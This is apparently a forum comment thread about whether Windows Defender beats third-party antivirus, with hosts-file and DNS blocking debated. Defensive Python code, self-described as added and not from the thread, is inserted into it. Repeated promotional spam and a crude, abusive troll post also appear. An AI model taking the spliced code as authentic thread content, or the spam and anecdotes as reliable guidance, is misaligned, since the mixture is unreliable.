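        f.write(b"constructed sample build 2")    # an update changed the bytes
    third = ledger.should_prompt(sample)          # new content: prompt again
    with open(sample, "wb") as f:
        f.write(b"constructed sample build 1")
    reloaded = SubmissionLedger(ledger_file)      # survives a restart
    fourth = reloaded.should_prompt(sample)       # build 1 still on record
    return first, second, third, fourth


if __name__ == "__main__":
    print(demo())
```

The ledger stores only digests, never the files, so it leaks nothing if copied; a real implementation would also bound its size and expire entries once the vendor has returned a verdict.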

  36. Re:MicroShaft by unixisc · · Score: 1

    AC, where did you read Beau's name? msmash posted this. You might have had more credibility had you gotten at least THIS right

  37. Kindly Fuck Off Web Browser Devs that Enable Malw by Anonymous Coward · · Score: 0

    The real problem is the fact that the web is now just a bunch of horrible code being run and installed on your machine constantly. Instead of designed for security and convenience, things are now designed on greed and screw all the end users. 98% of the population gets malware because of this. It's the evil type of devs that are killing the www world, the PC, and the sanity of the human race!

  38. Re:Disable ad-blocker for a paragraph of twitter c by Zocalo · · Score: 4, Informative

    Black-holing garbage domains (ad sources and trackers especially) is definitely a good idea, but the problem with a hosts file is that you can't do wildcards, so while you can easily block "foo.domain.com" and "bar.domain.com", you can't block "{random string}.domain.com" unless you know what "{random string}" is in advance - to do that requires either a DNS based blocklist or some other software tool. That's getting to be a problem given that marketing/tracking companies are slowly (and it's taken them long enough) waking up to the possibility that you can use "{random string}" as a wildcarded DNS entry to track whether a link was looked at or not just as effectively as a custom URL or cookie.

    Also, to add to the GP's comment about the importance of an Ad-Blocker, let's not forget blocking auto-run of certain browser plugins and the ability to whitelist sites that can run JavaScript / save cookies.

    --
    UNIX? They're not even circumcised! Savages!
  39. Hosts file and my gaping ass hole by Anonymous Coward · · Score: 0, Offtopic

    Look at a link to a retarded comment I made so long ago the internet forgot about it /https://it.slashdot.org/comments.pl?sid=9995967&cid=53488785b

    APK Hosts File Engine 9.0++ SR-5 32/64-bit is all you need. It generates a new hosts file nightly from the shit splatter when I sodomize a cat

    You are all Cows. Cows say MOO. MOO MOO.

    Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively all while redirecting you to pictures of my gaping ass hole.

    Thank you GNAA and Happy Wednesday from the Golden Girls

    APK

    P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

  40. Re:Sure! It's okay to settle for Defender! by Anonymous Coward · · Score: 0

    So you will agree to compensate my clients for lost data if they install your preferred AV? If so, you are a moron.

  41. The solution is worse than the problem by danbert8 · · Score: 1

    Anti-virus suites have one huge problem. They are worse than getting a virus. At least a virus tries to hide and not kill your system. AV programs have no such respect for the users.

    --
    Yes it's an anecdote! Were you expecting original research in a Slashdot comment?
  42. Re:Disable ad-blocker for a paragraph of twitter c by Anonymous Coward · · Score: 1

    At least they are kind enough to provide a "Continue without supporting us" link unlike WSJ SJW.

  43. Definitely agree by Ambassador+Kosh · · Score: 2

    I had bitdefender installed on my machine about a year ago and I was writing c++ HPC software. Everything was compiled with the Intel compiler and mkl with profile guided optimizations. Bitdefender started detecting my binaries as virus infected and deleting them. This happened a few times and I disabled it for a month and later turned it back on with newer virus definitions and the same issue kept happening. It even detected some of the binaries I had on a shared drive and deleted them also.

    The false positive rate on some of these scanners is just too high.

    I will just stay with windows defender since it has not interfered with any of my debugging or profiling and has never deleted the software I am compiling.

    --
    Computer modeling for biotech drug manufacturing is HARD! :)
    1. Re:Definitely agree by Anonymous Coward · · Score: 0

      I had an AV program flag a hello world program I wrote in x64 assembler. Seriously. I couldn't believe it. I was writing the program to learn the differences between 32-bit and 64-bit assembler and it flagged a hello world program.

      I sent the code to the AV vendor and they fixed the detection.

  44. It's about internet filtering by grahamtriggs · · Score: 1

    Strongly suspect the main reason the browser developers like Microsoft Defender as a "well behaved" AV is because it's purely a file level defence, and so doesn't interfere with the behaviour of the browser. Unlike many third party AVs, that will intercept internet traffic, looking for bad stuff before it hits your browser.

    That's good from a browser point of view, because they don't have to deal with browsing problems being caused by the AV engine (for example, without whitelisting, ESET's engine will cause logins to my wireless router's web interface to break).

    But it's not so good from an end user perspective, when malicious content is attacking the HTML / Javascript engines. There are trade offs to however you choose to manage your security, but I suspect for most people, actually using a good 3rd party paid-for AV is a good balance of having reasonably good protection without having to be overly pro-active in managing it.

    1. Re:It's about internet filtering by Anonymous Coward · · Score: 0

      Bingo!!!! For a modern AV to be good it can't be file focused. It has to integrate with the browser. This integration obviously is no fun for browser developers who are the ones complaining.

  45. I agree with that by DrXym · · Score: 1

    Defender just gets on with its job with relatively little overhead or other intrusion. The same cannot be said of virtually any other AV suite. Even the "reputable" ones like McAfee, Norton etc. seem to exist as a form of crapware these days and are so bloated and slow that any protection comes at a high price.

  46. Microsoft Defender most well-behaved security suit by khz6955 · · Score: 2

    Well, it would be considering the Defender developers have full access to Windows.

  47. I'll believe it when.. by ITRambo · · Score: 0

    I'll believe it when AV-Test.org and AV-Comparatives.org show that Defender actually blocks viruses as well as the top performers do. Currently, it's at the bottom of the barrel for effectiveness, well behaved, or not.

    1. Re:I'll believe it when.. by Anonymous Coward · · Score: 0

      The difference won't matter as much after you train your family and employees not to click on every flashing link on the internet and open every email attachment they are sent.

      If all of your family members and employees are too stupid to grasp this concept though then yes, your charts start to matter.

  48. Anti-vaxers have hit computers... by Anonymous Coward · · Score: 0

    These articles sound a lot like antivaxxers...except for computers

  49. Idiotic, shortsighted report by Anonymous Coward · · Score: 0

    What this report completely fails to address is the utter uselessness of Defender as an anti-virus tool. It has the lowest hit record of any AV product, even lower than Norton's. In other words, it is totally useless and is almost guaranteed to ensure any machine relying on it will get infected at some point.

  50. What kind of crap hardware do you need to run to by Anonymous Coward · · Score: 0

    What kind of crap hardware do you need to run to notice the resource drain from an AV suite in 2017? I'm sitting on like a 4-5 year old i5-2400 and it's running Kaspersky and I can't detect any performance drain at all. Like in 2002 when I was running a 1200MHz Athlon with 256MB of RAM, yeah, AV could and would massively slow down the system. Today? You have to be running decade old hardware for this to be an issue.

  51. Re: MicroShaft by Khyber · · Score: 1

    "As a former developer of web browsers (6 years of it), I can confirm that from a developer's point of view, Microsoft hooks more cleanly into the sockets API than the other's I've used"

    As a typical computer user with basic fucking logic, NO DUH Microsoft can more cleanly hook into its own API than others.

    --
    Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
  52. Re:Disable ad-blocker for a paragraph of twitter c by wasteoid · · Score: 2

    Agreed. Twitter is an utterly useless site.

  53. Re:Disable ad-blocker for a paragraph of twitter c by Anonymous Coward · · Score: 0

    A large hosts file over 1mb on windows conflicts with the DNS caching service - disable the DNS caching service and it works fine. That's what they're referring to. I'm no fan of DNS caching anyway.

  54. Re:Disable ad-blocker for a paragraph of twitter c by Khyber · · Score: 1

    Large anything degrades performance. Period. The larger it is, the more resources it uses.

    Hosts is garbage in the world of IPv6. Hosts is a piece of insecure shit cobbled together from the late 90s meant to identify computers on a local network with a name instead of IP address, and any serious security person never uses it as it's bypassed by the OS at will (and several programs with the right calls) nowadays anyways.

    --
    Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
  55. the singular of anecdote by epine · · Score: 2

    I read the entire thread up to my standard filter level, and this is what I concluded: the singular of anecdote is "one size fits all".

    It's pretty clear from what I've read here that for a low-value target, I'd just settle for the low-hanging fruit of Windows Defender, ad blocking, a DNS block list, etc.

    It's also pretty clear that for a high value target (e.g. law firm, bank) where the minimum system install is a bulked-out i7 I'd elect to suffer the bloat & obtrusiveness in order to obtain the somewhat better catch rate of a first-tier third-party solution. The people working for these kinds of institutions are pretty demoralised to begin with, it will just look like business as usual (and so it is).

    The other side of this is that "one size fits all" is directly connected to the competency porn carapace. "Well, I work for banks and law firms and YOU can't handle the truth". But what actually gets written is this "YOU can't handle compensating my clients for a 48-hour loss of service". This tends to be a person whose amygdala has swollen to such a painfully large size that he or she can no longer multiply 1% times 365 (the constant friction of a badly behaved "solution") and can only multiply 100% times 2 days (as specified under the total availability-loss Weimar Reparations Act).

  56. Someone has obviously not used BitDefender by kriston · · Score: 1

    Someone has obviously not used BitDefender.

    --
    Kriston

    1. Re:Someone has obviously not used BitDefender by Anonymous Coward · · Score: 0

      BitDefender managed to ignore the settings I gave it instructing it not to delete files without my say so. On several occasions it did so anyway. These files were completely harmless (and IIRC I made a few of them).

      Other files that it quarantined were no longer available to me after the subscription expired. If I wanted them back, I would have to send them to Bitdefender, regardless of whether or not the files were private. In fact, I had to tear apart a few database files just to figure out which files were which.

      It pulled some other crap on me that I can't recall off the top of my head. However, the bottom line is that BitDefender thinks it knows better than you, even when it doesn't, and as such it acts like it has rabies. The free version is even worse; IIRC it lacks even the minimally-effective controls I tried to use to rein it in. Apparently if you do much of anything that might be considered "advanced" with the computer, e.g. using security and networking tools, it decides that it's not going to let that happen, no matter what it was set to do before.

  57. Absolutely agree... by bradley13 · · Score: 1

    I haven't run any virus checker other than the one built-in to Windows for years now. They all catch old or obvious viruses. None of them is going to catch a new, clever virus. There's not a whole lot in the middle. Add in the virus-like behavior of the AV itself, the performance-suck of most of them, and it just doesn't make any sense to use them.

    As another poster pointed out: user error is the biggest cause of virus infection. Train your users, use Windows Defender as a sort of "sanity check", make regular backups, and call it a day.

    --
    Enjoy life! This is not a dress rehearsal.
  58. Best behaved antivirus (you fully control it) by Anonymous Coward · · Score: 0

    See subject: Prevention is the best medicine (& what you can't touch can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

    Ads & malware rob speed, security & privacy

    Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

    Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

    * Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

    APK

    P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

  59. I must confess... by John.Banister · · Score: 1

    I have a strong instinct to take it with a bucket of salt when a stranger on the internet tells me "oh yeah, you should ditch your AV."

  60. Re: MicroShaft by MightyMartian · · Score: 4, Insightful

    I think it's a bit more than just "Microsoft unfair advantage". Other AV products have always been monstrously bloated affairs, and have become all the worse over the last decade as they throw all kinds of other shit like firewalls and the like in. Products like McAfee and Norton have become almost as bad as the disease they purport to treat. So far as I can tell, Defender really doesn't do much more than sniff out viruses and malware, and while I agree Microsoft's insider knowledge probably gives it a bit of an edge, I think the narrower intent of the software has a lot to do with its better performance.

    --
    The world's burning. Moped Jesus spotted on I50. Details at 11.
  61. Anecdotal evidence by Simulant · · Score: 1

    I've been running my company on MSE/FEP/Defender for the past 6 years with zero headaches caused by the anti-virus software itself and an infection rate of maybe 5 or 6 per year across 200 PCs and laptops. Users have local admin rights. Perimeter IDS catches some things that get through.

    It seems to work better than any other anti-virus I've used and I hate them all. It's certainly the least annoying.

  62. Not saying much by Tablizer · · Score: 1

    In the land of the Blind-and-Stupid, those that are only blind or only stupid have an advantage.

    Insert presidential election comparison here.

  63. Is Windows Defender also malware? by Futurepower(R) · · Score: 1

    Questions:

    Does Windows Defender try to do other things besides defending?

    Does Microsoft use Windows Defender as a way of gaining control over a computer?

    1. Re:Is Windows Defender also malware? by Anonymous Coward · · Score: 0

      Does Windows Defender try to do other things besides defending?

      No, unlike some components of Windows ("Cortana Support Systems" or whatever they decided to rename the basic local search executable), Windows Defender has a very clear and explicit role that it does not exceed.

      Does Microsoft use Windows Defender as a way of gaining control over a computer?

      No, it does not have the interfaces to do that. They could easily have an admin backdoor in the remote desktop code, that would be a much better place to put "gain control over a computer" routines because it already is a program to let someone somewhere else gain control over a computer.

      Here's the real kicker that some here are afraid to admit: Microsoft doesn't want control over your computer, the most they want is information on how to be either a middleman or true supplier for the things you want to buy. That includes things like aggregated UI activity to determine which of the 6 ways to open a file you are using most often, so they can see if some of their designs are going completely unused. It also includes more attention to search queries than I prefer, but still much less extensive than Google's buyological profiling system.

  64. Re:Sure! It's okay to settle for Defender! by Chas · · Score: 1

    Sorry, but in business, if you care about your data you go belt AND suspenders.

    You run a multi-layer backup strategy.
    You run antivirus.
    You don't use "server" devices as someone's workstation.
    Etc, etc.

    Sure, your chances, especially with an intelligent, tech-savvy userbase are tiny.
    But security is about more than just obvious stuff. And if you can catch corner-cases, so much the better. Less effort and cost for the client in the long run.

    --
    Chas - The one, the only.
    THANK GOD!!!
  65. Well behaved doesn't mean it is good at benchmarks by Phaid · · Score: 1

    Antivirus software is a hot topic in IT security right now. Not because you need AV, but because most AV is terribly designed and breaks security in other applications. And while Windows Defender may not score particularly well on canned tests used by AV reviewers, it doesn't break as much software as other AVs do.

    Remember that in order to work, AV has to inject itself all over the place in your system to intercept network activity, disk activity, etc. But if it does that at the expense of other security measures, is it really helping? As Justin Schuh said in his linked post, when Firefox implemented Address Space Layout Randomization (ASLR) to guard against buffer overflows, lots of AV suites disabled it by replacing Firefox's DLLs with their own which didn't feature ASLR. This stuff happens all the time, because AV vendors are always behind the curve in browser security compared to browser developers. Which isn't all that surprising if you think about it.

    The upshot is, all AV software is pretty terrible. MS Defender isn't as good as some other AV suites at passing the canned tests that AV review sites throw at them. But at least it doesn't work against web browsers' built-in security measures.
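
The concrete thing to verify when the post above worries about a DLL swapped in without ASLR is whether the image opts into randomisation at all. The check below is an added example, not code from the thread, from Firefox or from any AV vendor: it reads the PE headers of an EXE/DLL and reports the DYNAMIC_BASE, HIGH_ENTROPY_VA and NX_COMPAT bits of DllCharacteristics, and also whether relocations were stripped, since an image without relocations cannot be rebased even if the ASLR bit is set. The two sample images are constructed in-memory header blobs (DOS stub, COFF header, optional header only), not real binaries; `check_file` is the hypothetical entry point for a file on disk.

```python
"""Report whether a PE image (EXE/DLL) opts into ASLR and DEP by parsing
its headers. A DLL loaded into a browser that lacks DYNAMIC_BASE, or has
its relocations stripped, cannot be randomised and weakens the process.

Added example: not from the thread, Firefox or any AV product. The two
sample images are constructed minimal headers, not real binaries."""
import struct

IMAGE_FILE_RELOCS_STRIPPED = 0x0001   # COFF Characteristics: no .reloc, cannot rebase
DLLCHAR_HIGH_ENTROPY_VA = 0x0020      # DllCharacteristics: 64-bit ASLR
DLLCHAR_DYNAMIC_BASE = 0x0040         # DllCharacteristics: ASLR opt-in
DLLCHAR_NX_COMPAT = 0x0100            # DllCharacteristics: DEP opt-in


def pe_mitigations(data: bytes) -> dict:
    """Parse the headers at the start of `data` and return the mitigation bits."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    coff = pe_off + 4
    characteristics = struct.unpack_from("<H", data, coff + 18)[0]
    opt = coff + 20                                           # optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):                           # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ layouts.
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    relocs_stripped = bool(characteristics & IMAGE_FILE_RELOCS_STRIPPED)
    dynamic_base = bool(dll_chars & DLLCHAR_DYNAMIC_BASE)
    return {
        "pe32plus": magic == 0x20B,
        "dynamic_base": dynamic_base,
        "relocs_stripped": relocs_stripped,
        "aslr_effective": dynamic_base and not relocs_stripped,
        "high_entropy_va": bool(dll_chars & DLLCHAR_HIGH_ENTROPY_VA),
        "nx_compat": bool(dll_chars & DLLCHAR_NX_COMPAT),
    }


def check_file(path: str) -> dict:
    """Hypothetical helper: run the check on an on-disk image (headers fit in 4 KiB)."""
    with open(path, "rb") as f:
        return pe_mitigations(f.read(4096))


def build_headers(magic: int, dll_chars: int, characteristics: int = 0) -> bytes:
    """Constructed minimal PE header: DOS stub + signature + COFF + optional header."""
    pe_off = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    opt_size = 240 if magic == 0x20B else 224
    machine = 0x8664 if magic == 0x20B else 0x14C
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, dll_chars)
    return dos + b"PE\0\0" + coff + bytes(opt)


def demo() -> tuple:
    """A hardened 64-bit image beside a 32-bit one built without ASLR."""
    hardened = build_headers(0x20B, DLLCHAR_DYNAMIC_BASE | DLLCHAR_HIGH_ENTROPY_VA | DLLCHAR_NX_COMPAT)
    legacy = build_headers(0x10B, DLLCHAR_NX_COMPAT)
    return pe_mitigations(hardened)["aslr_effective"], pe_mitigations(legacy)["aslr_effective"]


if __name__ == "__main__":
    print(demo())
```

Run `check_file` over the modules actually loaded into the browser process (a process explorer or `tasklist /m` will list them) and any third-party DLL that reports `aslr_effective: False` is the kind of injected module the post is describing.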

  66. Re:Disable ad-blocker for a paragraph of twitter c by Anonymous Coward · · Score: 0

    Run your own local DNS server - even on a pi - and you can block everything from TLDs down.
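
Both this post and Zocalo's earlier one (hosts files cannot express "{random string}.domain.com"; a resolver-side blocklist can, and can block a whole TLD) come down to exact-match versus suffix-match semantics. The comparison below is an added example, not code from the thread or from any DNS or blocklist product: a tiny hosts-file matcher beside a resolver-style suffix matcher, run over constructed hostnames and constructed block rules (the `.example` and `.test` names are reserved documentation TLDs).

```python
"""Exact-match blocking (hosts-file semantics) versus suffix-match
blocking (what a local DNS resolver blocklist can do, down to a TLD).

Added example: not from the thread or any DNS/blocklist product; the
hosts lines, zone rules and queried names are constructed."""


class HostsFileBlocklist:
    """Hosts-file semantics: only hostnames written out in full can match."""

    def __init__(self, lines):
        self.names = set()
        for line in lines:
            line = line.split("#", 1)[0].strip()   # strip comments
            if not line:
                continue
            parts = line.split()                   # <address> <name> [<alias>...]
            for name in parts[1:]:
                self.names.add(name.lower().rstrip("."))

    def is_blocked(self, host: str) -> bool:
        return host.lower().rstrip(".") in self.names


class DnsSuffixBlocklist:
    """Resolver semantics: a rule for 'domain.com' covers every label below it,
    and a rule may be as short as a bare TLD."""

    def __init__(self, zones):
        self.zones = {z.lower().strip(".") for z in zones}

    def is_blocked(self, host: str) -> bool:
        labels = host.lower().rstrip(".").split(".")
        # walk from the full name up to the TLD; any ancestor rule blocks
        for i in range(len(labels)):
            if ".".join(labels[i:]) in self.zones:
                return True
        return False


# Constructed rules: the hosts file can only list names it already knows.
HOSTS_LINES = [
    "0.0.0.0 foo.tracker.example   # constructed",
    "0.0.0.0 bar.tracker.example",
]
# Constructed resolver rules: one zone and one whole (reserved) TLD.
DNS_ZONES = ["tracker.example", "test"]


def compare(hosts):
    """Return {name: (blocked_by_hosts_file, blocked_by_dns_suffix)}."""
    h = HostsFileBlocklist(HOSTS_LINES)
    d = DnsSuffixBlocklist(DNS_ZONES)
    return {name: (h.is_blocked(name), d.is_blocked(name)) for name in hosts}


if __name__ == "__main__":
    for name, verdict in compare(["foo.tracker.example", "x7q9.tracker.example",
                                  "mail.example.test", "tracker.example.com"]).items():
        print(name, verdict)
```

The per-link random label (`x7q9.tracker.example`) slips past the hosts file but not the suffix rule, and a bare TLD rule blocks `mail.example.test` with no per-host entry at all. A suffix rule must anchor on label boundaries, which is why the matcher walks labels rather than calling `endswith`; otherwise `tracker.example.com` would be caught by a rule for `example.com` only, not by `tracker.example`.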

  67. yeah right by Anonymous Coward · · Score: 0

    Their disregard for security and privacy makes them be silly like this. MS cr*p maybe best for them because it offers no protection whatsoever to the end user....

  68. Microsoft managers have little social ability? by Futurepower(R) · · Score: 2

    Thanks for your reply.

    "... the most they [Microsoft managers] want is information on how to be either a middleman or true supplier for the things you want to buy."

    That seems correct to me. However, it seems to me that Microsoft managers have little social ability. They can be self-destructive and not detect that they are being self-destructive. One example: In Windows 10, Microsoft tries to sell "APPS" to people who are employees of companies doing routine work.

    It seems to me that Microsoft managers saw the success of Google's Android and search abusiveness, and wanted some of that success for themselves.

    1. Re:Microsoft managers have little social ability? by david_thornley · · Score: 1

      The big problem Microsoft has here is that their people just don't seem to understand the difference between a phone and a desktop, and are going for a one-size-fits-all solution, unlike Apple and its iOS/OSX approach. After all, if you buy limited apps for your phone that are designed to work on a small touch screen, that must be what you want for your computer with 4K monitor, keyboard and mouse, right?

      --
      "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
  69. So WTF by Anonymous Coward · · Score: 0

    All of a sudden the push to do away with AV. After reading security alerts all the time about this or that, now the propaganda is to lower my defenses, drop AV and let everyone have at it with my systems?

    prove it!

  70. Re: MicroShaft by ctilsie242 · · Score: 0

    The thing about AV... it is there mainly to tick off a checkbox. Does it actually work? At best, it might catch a moldie oldie, but in reality, it will do nothing against major infection vectors like malvertising. In my experience, an ad blocker, setting "click to play" for content, and something like NoScript is far more effective than any AV will be. Mainly because when the AV utility detects things, it is usually too late.

    So, because AV really can't do that much, might as well have it use as little resources as possible and still at least be minimally effective against non zero-days.

  71. Not Really Surprised by EndlessNameless · · Score: 1

    Most AV software is bloated crap that offers little actual security.

    Microsoft has been focusing on power efficiency and battery life, so I'm not surprised if they traded off a little detection capability in order to run smoother.

    Antivirus isn't even on the top of the list for avoiding an infection. That would be (1) don't browse as admin, (2) keep software updated, and (3) use an adblocker or filtering proxy.

    With the vast majority of malware being drive-by downloaders, a good adblocker or filter offers more security and better performance. Antivirus is for suckers these days.

    Serious host protection includes active IPS and/or application whitelisting, often in lieu of antivirus.

    --
    According to the latest ruleset, this post should be modded as Vorpal Flamebait +5.
  72. Hosts do it OUT of browser, better/faster by Anonymous Coward · · Score: 0

    In kernelmode faster IP stack level: Prevention is the best medicine (& what you can't touch can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

    Ads & malware rob speed, security & privacy

    Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

    Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

    * Using what you already NATIVELY have - doing more for less vs. other methods.

    APK

    P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

  73. This prevents that bigtime via hosts by Anonymous Coward · · Score: 0

    Prevention is the best medicine (& what you can't touch can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

    Ads & malware rob speed, security & privacy

    Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

    Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

    * Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

    APK

    P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

  74. Re: Disable ad-blocker for a paragraph of twitter by Anonymous Coward · · Score: 0

    The hosts file is from the early 1980s, dummy; it predates DNS. Get off my lawn.

  75. Hosts do more for less vs. addons & faster by Anonymous Coward · · Score: 0

    What hosts do addons can't (or as well):

    PROTECT vs.:

    1.) bad sites (past ads)
    2.) fastflux C&C
    3.) dynDNS C&C
    4.) DGA C&C
    5.) DNS down
    6.) poisoned dns
    7.) trackers (dnsrequestlogs/ads/transparent ISP proxy)
    8.) spam/phish payload
    9.) dns blocks
    10.) slowdown 2 ways: adblocks & hardcodes

    11.) Multiplatform
    12.) Ez data edit
    13.) Efficiency (cpu/ram/I-O)

    14.) UBlock no DNS bennys = poor imitation = "sincerest form of flattery"
    15.) NoScript tag parses. Hosts block ad script before it downloads!

    APK

    P.S.=> AB+ 151mb http://cdn.ghacks.net/wp-content/uploads/2014/06/adblocker-memory-consumption.jpg/

    UBlock 64MB http://cdn.ghacks.net/wp-content/uploads/2014/06/adblocker-memory-consumption.jpg/

    (hosts ~6mb)

    ClarityRay defeatable

    Don't work http://www.businessinsider.com/google-microsoft-amazon-taboola-pay-adblock-plus-to-stop-blocking-their-ads-2015-2/

    SLOWER: http://superuser.com/questions/686041/which-leads-to-faster-browsing-an-ad-blocker-or-an-edited-hosts-file/

  76. For the best possible hosts file by Anonymous Coward · · Score: 0

    APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

    Ads & malware rob speed, security & privacy

    Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

    Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

    * Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

    APK

    P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

  77. Re:Disable ad-blocker for a paragraph of twitter c by Anonymous Coward · · Score: 0

    Use this link if you don't want to turn off your ad blocker.

  78. Duh. This has been true for years. by DarthVain · · Score: 1

    Anyone that has had to use AV software for any amount of time can easily tell you that Windows Defender is the *only* AV software anyone should be using anymore. Back in the day, there were a number of products out there which I would call good. Now, probably due to increased pressure for more profits, subscriptions, and increased monetization of every aspect of their business, I wouldn't want any of them. Not only are they all bloated resource hogs, they cause more problems than the viruses they catch. I'd rather have the viruses, as at least you don't pay for those. I don't know how many times I've had to look at friends' or family members' computers to find that some commercial AV software was causing all sorts of trouble. Is Defender the best at finding viruses? I don't know, perhaps not, but I do not care. I'd rather have something that provides most protection but isn't so intrusive that it acts more or less like what it is trying to detect and remove.

    I'd say there is one little caveat to the above. I'm referring specifically to ANTI-VIRUS software. An awful lot (if not most nowadays) of "malware" might be better categorized as "Adware". There are a number of products out there that do a good job dealing with Adware. Most Adware of course targets your various browsers. I'd say as a rule there are a lot more of those out there in the wild than actual "viruses". Anyway, I would use both, Defender for viruses, and another product more specifically focused on Adware.

    For a variety of reasons, years ago I used to run an unpatched Windows 7 machine. That thing was like a virus trawler! At any rate I had a lot of opportunity to use a host of tools and software. Having a good firewall (and setup), not going to sketchy websites, or clicking on stupid things goes a long way by itself. However, inevitably you'd get things that require clean up. As mentioned, some things worked better than others, and some were as bad as the viruses they were supposed to protect you from. With that particular system, I think one of the easiest (provided you are prepared) and most certain things I did was, about every year or so, I would just wipe the whole thing clean, do a fresh install, and restore files from backup. Get used to doing it a few times and it takes a few hours, and you can automate most of it.

  79. Serious hosts protection = hosts by Anonymous Coward · · Score: 0

    Better antivirus than antivirus: Prevention = best medicine (what can't touch you can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

    Ads & malware rob speed, security & privacy

    Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

    Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

    * Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

    APK

    P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

  80. Re: MicroShaft by Anonymous Coward · · Score: 0

    Evolutionists can't explain PESKY ARKS!

  81. Hosts do more for less vs. addons & faster by Anonymous Coward · · Score: 0

    What hosts do addons can't (or as well):

    PROTECT vs.:

    1.) bad sites (past ads)
    2.) fastflux C&C
    3.) dynDNS C&C
    4.) DGA C&C
    5.) DNS down
    6.) poisoned dns
    7.) trackers (dnsrequestlogs/ads/transparent ISP proxy)
    8.) spam/phish payload
    9.) dns blocks
    10.) slowdown 2 ways: adblocks & hardcodes

    11.) Multiplatform
    12.) Ez data edit
    13.) Efficiency (cpu/ram/I-O)

    14.) UBlock no DNS bennys = poor imitation = "sincerest form of flattery"
    15.) NoScript tag parses. Hosts block ad script before it downloads!

    APK

    P.S.=> AB+ 151mb http://cdn.ghacks.net/wp-content/uploads/2014/06/adblocker-memory-consumption.jpg/

    UBlock 64MB http://cdn.ghacks.net/wp-content/uploads/2014/06/adblocker-memory-consumption.jpg/

    (hosts ~6mb)

    ClarityRay defeatable

    Don't work http://www.businessinsider.com/google-microsoft-amazon-taboola-pay-adblock-plus-to-stop-blocking-their-ads-2015-2/

    SLOWER: http://superuser.com/questions/686041/which-leads-to-faster-browsing-an-ad-blocker-or-an-edited-hosts-file/

  82. Re: MicroShaft by Darinbob · · Score: 1

    It's nice to have the firewall though. Windows does not have a reasonable alternative. Some other features that AV packages have can be handy when setting up systems for relatives who are clueless about computers, like warning when a site is potential spam, your credit card number is going out in the clear, and so forth. Most malware these days is coming over the web browser, so the first line of defense should be there, and the AV is just to help catch what gets through.

  83. For the best possible hosts file by Anonymous Coward · · Score: 0

